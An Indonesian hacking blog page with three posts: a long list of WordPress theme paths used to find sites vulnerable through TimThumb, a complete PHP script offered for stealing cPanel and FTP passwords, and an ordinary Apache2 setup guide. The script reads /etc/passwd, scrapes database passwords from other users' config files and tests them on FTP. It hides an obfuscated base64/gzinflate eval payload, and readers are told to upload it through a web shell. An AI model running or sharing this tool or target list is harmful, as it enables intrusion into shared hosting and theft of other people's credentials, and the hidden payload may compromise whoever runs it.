Selasa, 01 November 2011

Bug dork List Timthumb

 Bug dork List Timthumb

/wp-content/themes/TheStyle/
/wp-content/themes/nool/
/wp-content/themes/PersonalPress/
/wp-content/themes/SimplePress/
/wp-content/themes/DeepFocus/
/wp-content/themes/DelicateNews/
/wp-content/themes/Bold/
/wp-content/themes/eStore/
/wp-content/themes/TheProfessional/
/wp-content/themes/OnTheGo/
/wp-content/themes/AskIt/
/wp-content/themes/Nova/
/wp-content/themes/eNews/
/wp-content/themes/eVid/
/wp-content/themes/TheCorporation/
/wp-content/themes/Minimal/
/wp-content/themes/Polished/
/wp-content/themes/MyResume/
/wp-content/themes/TheSource/
/wp-content/themes/StudioBlue/
/wp-content/themes/Wooden/
/wp-content/themes/WhosWho/
/wp-content/themes/Quadro/
/wp-content/themes/Glow/
/wp-content/themes/Modest/
/wp-content/themes/Aggregate/
/wp-content/themes/ArtSee/
/wp-content/themes/versatile/
/wp-content/themes/omni-shop/
/wp-content/themes/manifesto/scripts/
/wp-content/themes/arthem-mod/scripts/
/wp-content/themes/echoes/
/wp-content/themes/Bold4/
/wp-content/themes/primely-theme/scripts/
/wp-content/themes/zenkoreviewRD/scripts/
/wp-content/themes/ElegantEstate/
/wp-content/themes/PersonalPress2/
/wp-content/themes/mypage/scripts/
/wp-content/themes/magazinum/scripts/
/wp-content/themes/pbv_multi/scripts/
/wp-content/themes/photofeature/scripts/
/wp-content/themes/ColdStone/
/wp-content/themes/HMDeepFocus/
/wp-content/themes/EarthlyTouch/
/wp-content/themes/Boutique/
/wp-content/themes/ePhoto/
/wp-content/themes/PureType/
/wp-content/themes/13Floor/
/wp-content/themes/BusinessCard/
/wp-content/themes/CherryTruffle/
/wp-content/themes/Cion/
/wp-content/themes/DailyNotes/
/wp-content/themes/eGallery/
/wp-content/themes/eGamer/
/wp-content/themes/GrungeMag/
/wp-content/themes/Influx/
/wp-content/themes/LightBright/
/wp-content/themes/LightSource/
/wp-content/themes/Magnificent/
/wp-content/themes/Memoir/
/wp-content/themes/AskIt_v1.6/AskIt/
/wp-content/themes/TidalForce/
/wp-content/themes/Atlantis/
/wp-content/themes/DelicateNewsYellow/
/wp-content/themes/themorningafter/
/wp-content/themes/arthemia-premium/scripts/
/wp-content/themes/arthemia/scripts/
/wp-content/themes/arthemia-premium-park/scripts/
/wp-content/themes/linepress/
/wp-content/themes/wedding/
/wp-content/themes/graduate/
/wp-content/themes/wp-newspaper/
/wp-content/themes/advanced-newspaper/
/wp-content/themes/journey/
/wp-content/themes/newspro/
/wp-content/themes/transcript/
/wp-content/themes/showfolio/
/wp-content/themes/quickstart/
/wp-content/themes/Restorante/
/wp-content/themes/snapwire/
/wp-content/themes/aqua-blue/includes/
/wp-content/themes/swatch/functions/
/wp-content/themes/announcement/functions/
/wp-content/themes/empire/functions/
/wp-content/themes/supportpress/functions/
/wp-content/themes/editorial/functions/
/wp-content/themes/statua/functions/
/wp-content/themes/briefed/functions/
/wp-content/themes/faultpress/functions/
/wp-content/themes/kaboodle/functions/
/wp-content/themes/savinggrace/functions/
/wp-content/themes/premiere/functions/
/wp-content/themes/simplicity/functions/
/wp-content/themes/deliciousmagazine/functions/
/wp-content/themes/canvas-buddypress/functions/
/wp-content/themes/bookclub/functions/
/wp-content/themes/boldnews/functions/
/wp-content/themes/placeholder/functions/
/wp-content/themes/biznizz/functions/
/wp-content/themes/auld/functions/
/wp-content/themes/listings/functions/
/wp-content/themes/elefolio/functions/
/wp-content/themes/chapters/functions/
/wp-content/themes/continuum/functions/
/wp-content/themes/diner/functions/
/wp-content/themes/skeptical/functions/
/wp-content/themes/caffeinated/functions/
/wp-content/themes/crisp/functions/
/wp-content/themes/sealight/functions/
/wp-content/themes/unite/functions/
/wp-content/themes/estate/functions/
/wp-content/themes/tma/functions/
/wp-content/themes/coda/functions/
/wp-content/themes/inspire/functions/
/wp-content/themes/apz/functions/
/wp-content/themes/spectrum/functions/
/wp-content/themes/diarise/functions/
/wp-content/themes/boast/functions/
/wp-content/themes/retreat/functions/
/wp-content/themes/cityguide/functions/
/wp-content/themes/cinch/functions/
/wp-content/themes/slanted/functions/
/wp-content/themes/canvas/functions/
/wp-content/themes/postcard/functions/
/wp-content/themes/delegate/functions/
/wp-content/themes/mystream/functions/
/wp-content/themes/optimize/functions/
/wp-content/themes/backstage/functions/
/wp-content/themes/sophisticatedfolio/functions/
/wp-content/themes/bueno/functions/
/wp-content/themes/digitalfarm/functions/
/wp-content/themes/headlines/functions/
/wp-content/themes/f0101/functions/
/wp-content/themes/royalle/functions/
/wp-content/themes/exposure/functions/
/wp-content/themes/rockstar/functions/
/wp-content/themes/dailyedition/functions/
/wp-content/themes/object/functions/
/wp-content/themes/antisocial/functions/
/wp-content/themes/coffeebreak/functions/
/wp-content/themes/mortar/functions/
/wp-content/themes/bigeasy/functions/
/wp-content/themes/groovyphoto/functions/
/wp-content/themes/groovyblog/functions/
/wp-content/themes/mainstream/functions/
/wp-content/themes/featurepitch/functions/
/wp-content/themes/suitandtie/functions/
/wp-content/themes/thejournal/functions/
/wp-content/themes/myweblog/functions/
/wp-content/themes/aperture/functions/
/wp-content/themes/metamorphosis/functions/
/wp-content/themes/bloggingstream/functions/
/wp-content/themes/thestation/functions/
/wp-content/themes/groovyvideo/functions/
/wp-content/themes/productum/functions/
/wp-content/themes/newsport/functions/
/wp-content/themes/irresistible/functions/
/wp-content/themes/cushy/functions/
/wp-content/themes/wootube/functions/
/wp-content/themes/forewordthinking/functions/
/wp-content/themes/geometric/functions/
/wp-content/themes/abstract/functions/
/wp-content/themes/busybee/functions/
/wp-content/themes/blogtheme/functions/
/wp-content/themes/gothamnews/functions/
/wp-content/themes/thick/functions/
/wp-content/themes/typebased/functions/
/wp-content/themes/overeasy/functions/
/wp-content/themes/ambience/functions/
/wp-content/themes/snapshot/functions/
/wp-content/themes/openair/functions/
/wp-content/themes/freshfolio/functions/
/wp-content/themes/papercut/functions/
/wp-content/themes/proudfolio/functions/
/wp-content/themes/vibrantcms/functions/
/wp-content/themes/freshnews/functions/
/wp-content/themes/livewire/functions/
/wp-content/themes/gazette/functions/
/wp-content/themes/flashnews/functions/
/wp-content/themes/premiumnews/functions/
/wp-content/themes/newspress/functions/
/wp-content/themes/8q/scripts/
/wp-content/themes/aerial/lib/
/wp-content/themes/aesthete/
/wp-content/themes/albizia/includes/
/wp-content/themes/amphion-lite/script/
/wp-content/themes/aranovo/scripts/
/wp-content/themes/arras/library/
/wp-content/themes/arras-theme/library/
/wp-content/themes/arthemix-bronze/scripts/
/wp-content/themes/artisan/includes/
/wp-content/themes/arthemix-green/scripts/
/wp-content/themes/a-simple-business-theme/scripts/
/wp-content/themes/a-supercms/
/wp-content/themes/aureola/scripts/
/wp-content/themes/aurorae/
/wp-content/themes/autofashion/
/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/
/wp-content/themes/bikes/
/wp-content/themes/automotive-blog-theme/
/wp-content/themes/black_eve/
/wp-content/themes/blex/scripts/
/wp-content/themes/bloggnorge-a1/scripts/
/wp-content/themes/blogified/
/wp-content/themes/blue-corporate-hyve-theme/
/wp-content/themes/bluemag/library/
/wp-content/themes/blue-news/scripts/
/wp-content/themes/bombax/includes/
/wp-content/themes/breakingnewz/
/wp-content/themes/brightsky/scripts/
/wp-content/themes/brochure-melbourne/includes/
/wp-content/themes/business-turnkey/assets/js/
/wp-content/themes/calotropis/includes/
/wp-content/themes/coffee-lite/
/wp-content/themes/comet/scripts/
/wp-content/themes/conceditor-wp-strict/scripts/
/wp-content/themes/constructor/layouts/
/wp-content/themes/constructor/libs/
/wp-content/themes/constructor/
/wp-content/themes/coverht-wp/scripts/
/wp-content/themes/cover-wp/scripts/
/wp-content/themes/dark-dream-media/
/wp-content/themes/deep-blue/
/wp-content/themes/delicate/
/wp-content/themes/diamond-ray/
/wp-content/themes/dieselclothings/
/wp-content/themes/digitalblue/
/wp-content/themes/dimenzion/
/wp-content/themes/epione/script/
/wp-content/themes/evr-green/scripts/
/wp-content/themes/famous/megaframe/megapanel/
/wp-content/themes/famous/
/wp-content/themes/fashion-style/
/wp-content/themes/featuring/
/wp-content/themes/fliphoto/
/wp-content/themes/flix/
/wp-content/themes/fordreporter/scripts/
/wp-content/themes/freeside/
/wp-content/themes/fresh-blu/scripts/
/wp-content/themes/go-green/modules/
/wp-content/themes/granite-lite/scripts/
/wp-content/themes/greydove/
/wp-content/themes/greyzed/functions/efrog/lib/
/wp-content/themes/gunungkidul/
/wp-content/themes/heartspotting-beta/
/wp-content/themes/heli-1-wordpress-theme/images/
/wp-content/themes/ideatheme/
/wp-content/themes/impressio/timthumb/
/wp-content/themes/introvert/
/wp-content/themes/inuit-types/
/wp-content/themes/isotherm-news/
/wp-content/themes/iwana-v10/
/wp-content/themes/jambo/
/wp-content/themes/jcblackone/
/wp-content/themes/kratalistic/
/wp-content/themes/life-style-free/
/wp-content/themes/likehacker/
/wp-content/themes/litepress/scripts/
/wp-content/themes/loganpress-premium-theme-1/
/wp-content/themes/magazine-basic/
/wp-content/themes/magup/
/wp-content/themes/make-money-online-theme-1/scripts/
/wp-content/themes/make-money-online-theme-2/scripts/
/wp-content/themes/make-money-online-theme-3/scripts/
/wp-content/themes/make-money-online-theme-4/scripts/
/wp-content/themes/make-money-online-theme/scripts/
/wp-content/themes/meintest/layouts/
/wp-content/themes/mobilephonecomparision/
/wp-content/themes/moi-magazine/
/wp-content/themes/my-heli/images/
/wp-content/themes/mymag/
/wp-content/themes/mystique/extensions/auto-thumb/
/wp-content/themes/nash/theme-assets/php/
/wp-content/themes/neofresh/
/wp-content/themes/neo_wdl/includes/extensions/
/wp-content/themes/new-green-natural-living-ngnl/scripts/
/wp-content/themes/newspress/
/wp-content/themes/pearlie/scripts/
/wp-content/themes/pico/scripts/
/wp-content/themes/postage-sydney/includes/
/wp-content/themes/premium-violet/
/wp-content/themes/probluezine/
/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
/wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php
/wp-content/themes/r755/
/wp-content/themes/regal/
/wp-content/themes/shaan/
/wp-content/themes/shadow-block/
/wp-content/themes/shadow/
/wp-content/themes/simple-but-great/
/wp-content/themes/simplenews_premium/scripts/
/wp-content/themes/simple-red-theme/
/wp-content/themes/simple-tabloid/
/wp-content/themes/simplewhite/
/wp-content/themes/slidette/timThumb/
/wp-content/themes/snowblind_colbert/
/wp-content/themes/snowblind/
/wp-content/themes/spotlight/
/wp-content/themes/squeezepage/
/wp-content/themes/standout/
/wp-content/themes/suffusion/
/wp-content/themes/swift/includes/
/wp-content/themes/swift/includes/
/wp-content/themes/swift/
/wp-content/themes/techozoic-fluid/options/
/wp-content/themes/the_dark_os/tools/
/wp-content/themes/themetiger-fashion/
/wp-content/themes/theory/
/wp-content/themes/the-theme/core/libs/thumbnails/
/wp-content/themes/thrillingtheme/
/wp-content/themes/tm-theme/js/
/wp-content/themes/totallyred/scripts/
/wp-content/themes/travelogue-theme/scripts/
/wp-content/themes/true-blue-theme/
/wp-content/themes/ttnews-theme/
/wp-content/themes/typographywp/
/wp-content/themes/ugly/
/wp-content/themes/unity/
/wp-content/themes/versitility/
/wp-content/themes/vibefolio-teaser-10/scripts/
/wp-content/themes/vina/
/wp-content/themes/whitemag/script/
/wp-content/themes/wpapi/
/wp-content/themes/wpbus-d4/includes/
/wp-content/themes/wp-creativix/scripts/
/wp-content/themes/wp-newsmagazine/scripts/
/wp-content/themes/wp-perfect/js/
/wp-content/themes/wp-premium-orange/
/wp-content/themes/xiando-one/
/wp-content/themes/zcool-like/
/wp-content/themes/zcool-like/uploadify.php
/wp-content/themes/twittplus/scripts/
/wp-content/themes/OptimizePress/ "/wp-content/themes/OptimizePress/" .au

How to hacking / get login cpanel

 Hello gan, Nie gue sedikit pengen bagi2 source buat get pass cpanel hosting, yg mungkin bisa ngebantu temen2 semua buat cari user dan password cpanel.

LANGSUNG AJA GAN
Copy semua source yg ada ok...!

<HTML><HEAD><TITLE>Ftp Killer By QuantuM_QueeN & Mask_magicianZ</TITLE></HEAD><?php
/*
Brainfuck
Edited by BLACK_MASK
(c) http://p-range.info
*/
echo '<html><head><title>BLACK_MASK</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
    $str = fgets($passwd);
        if ($i > 35)
        {
            $pos = strpos($str,':');
            $username = substr($str,0,$pos);
            $dirz = '/home/'.$username.'/public_html/';
            if (($username != ''))
            {
                if (is_readable($dirz))
                {
                    array_push($users,$username);
                    array_push($pub,$dirz);
                }
            }
          }
    $i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
    $path = "/home/$user/public_html/";
    read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username)
{
    if ($handle = opendir($path))
    {
        while (false !== ($file = readdir($handle)))
        {
            $fpath = "$path$file";
            if (($file != '.') and ($file != '..'))
            {
                if (is_readable($fpath))
                {
                    $dr = $fpath."/";
                    if (is_dir($dr))
                    {
                        read_dir($dr,$username);
                    }
                    else
                    {
                         if (
                             ($file=='config.php')
                         or ($file=='config.inc.php')
                         or ($file=='conf.php')
                         or ($file=='settings.php')
                         or ($file=='configuration.php')
                         or ($file=='wp_config.php')
                         or ($file=='wp-config.php')
                          or ($file=='inc.php')
                         or ($file=='setup.php')
                         or ($file=='dbconf.php')
                         or ($file=='dbconfig.php')
                         or ($file=='db.inc.php')
                         or ($file=='dbconnect.php')
                         or ($file=='connect.php')
                         or ($file=='common.php')
                         or ($file=='config_global.php')
                         or ($file=='db.php')
                         or ($file=='connect.inc.php')
                         or ($file=='e107_config.php')
                         or ($file=='dbconnect.inc.php'))
                        {
                            $pass = get_pass($fpath);
                            if ($pass != '')
                            {
                                echo "[+] $fpath\n$pass\n";
                                ftp_check($username,$pass);
                            }
                        }
                    }
                }
            }
        }
    }
}
function get_pass($link)
{
    @$config = fopen($link,'r');
    while(!feof($config))
    {
        $line = fgets($config);
        if (strstr($line,'pass')
        or strstr($line,'pwd')
        or strstr($line,'db_pass')
        or strstr($line,'dbpass')
        or strstr($line,'passwd'))
        {
            if (strrpos($line,'"'))
            {
                preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
                $pass = str_replace("]=\"","",$pass);
            }

            else
                preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
                $pass = str_replace("]='","",$pass);
            return $pass[2];
        }
    }
}
function ftp_check($login,$pass)
{
    @$ftp = ftp_connect('127.0.0.1');
    if ($ftp)
    {
        @$res = ftp_login($ftp,$login,$pass);
        if ($res)
        {
            echo '[FTP] '.$login.':'.$pass."  Success !\n\n";

eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));

            echo '[SSH] Port'   .':' .$a1. "  !\n\n";
            echo '[FTP] Port'   .':' .$a2. "  !\n\n";
            echo '[cPanel] Port' .':' .$a3. "  !\n\n";

        }
        else ftp_quit($ftp);
    }
}
echo '</textarea><br><br><b>cPaneL Bruteforce Recode By Mask_magicianz Powered by RosebanditZ</b></body></html>';
?>

Setelah di Copy atau Ctrl +A - Ctrl +C Lalu paste di notped kedalam bentuk .php supaya gk lama command di shell nya. misal  menjadi file cp.php
lalau upload file trsebut kedalam shell injeck anda, setelah qm upload trus open newtab pada mozila anda
copy file cp.php trsbut dan gabungkan pada link shell anda.
exemple: misal shell bentuk c99  http://zen-ahmad.blogspot.com/view.php enah setelah anda uploading source cpanel trusebut trus copy file cpanelx. misal menjadi http://zen-ahmad.blogspot.com/cp.php <=-- lalu browser aja tunggu sampei selesai OK!
SELAMAT MENCOBA...

Install Apache2 in Ubuntu

Install Apache2 in Ubuntu

sudo aptitude install apache2

This will complete the installation.
After installation Type the server’s IP address (or alias if you added the server to your /etc/hosts file) in your browser’s address bar or, if you are browsing on the server itself, type 127.0.0.1 or localhost. If an error occurs, then you will have to edit the apache2.conf file to ensure that Apache can fully resolve the server’s name.If you have any problem then you have to edit the apache2 configuration file using the following command

sudo nano /etc/apache2/apache2.conf

Add the following line somewhere
ServerName localhost

or

ServerName yourserverip

Save and exit the file

Now you need to restart Apache server using the following command.

sudo apache2ctl restart

Change default document root in Apache2

The main configuration file located at /etc/apache2/apche2.conf.If you want to change the default document root you need to edit the /etc/apache2/sites-available/default file and look for this line “DocumentRoot /var/www/” here you can change where ever you want to change.For example if you want to change /home/www the above line looks like this “DocumentRoot /home/www/”.

Save and exit the file

Now you need to restart Apache server using the following command.

sudo apache2ctl restart

Enable PHP support for apache2 webserver

If you want to enable php5 or php4 support to your apache webserver use the following commands to install require packages

For PHP5

sudo aptitiude install php5 libapache2-mod-php5

For PHP4

sudo aptitiude install php4 libapache2-mod-php4

You also make sure the php5 and php4 modules are enabled using the following commands

sudo a2enmod php5

sudo a2enmod php4

After installing php support you need to restart apache webserver using the following command

sudo apache2ctl restart

Test your PHP Support foe apache webserver

To check the status of your PHP installation

sudo nano /var/www/testphp.php

and insert the following line



Save and exit the file

Now open web browser at http://yourserveripaddress/testphp.php and check.

Enable CGI and perl support for apache2 server

You need to install the following package

sudo aptitude install libapache2-mod-perl2

Configure a cgi-bin directory

You need to create a cgi-bin directory using the following command

sudo mkdir /home/www/cgi-bin

Configuring Apache to allow CGI program execution is pretty easy. Create a directory to be used for CGI programs and add the following to the site configuration file (again between the tags).

ScriptAlias /cgi-bin/ /home/www/cgi-bin/


Options ExecCGI
AddHandler cgi-script cgi pl


The first line creates an alias that points to the directory in which CGI scripts are stored. The final line tells Apache that only files that end with the *.cgi and *.pl extensions should be considered CGI programs and executed.

Test your Perl Program

cd /home/www/cgi-bin

sudo nano perltest.pl

Copy and paste the following section save and exit the file.

###Start###

#!/usr/bin/perl -w
print "Content-type: text/html\r\n\r\n";
print "Hello there!
\nJust testing .
\n";

for ($i=0; $i<10; $i++) { print $i."
";
}

###End###

make sure you change permissions on it

sudo chmod a+x perltest.pl

Now open your web browser open http://yourserverip/cgi-bin/perltest.pl.It should be working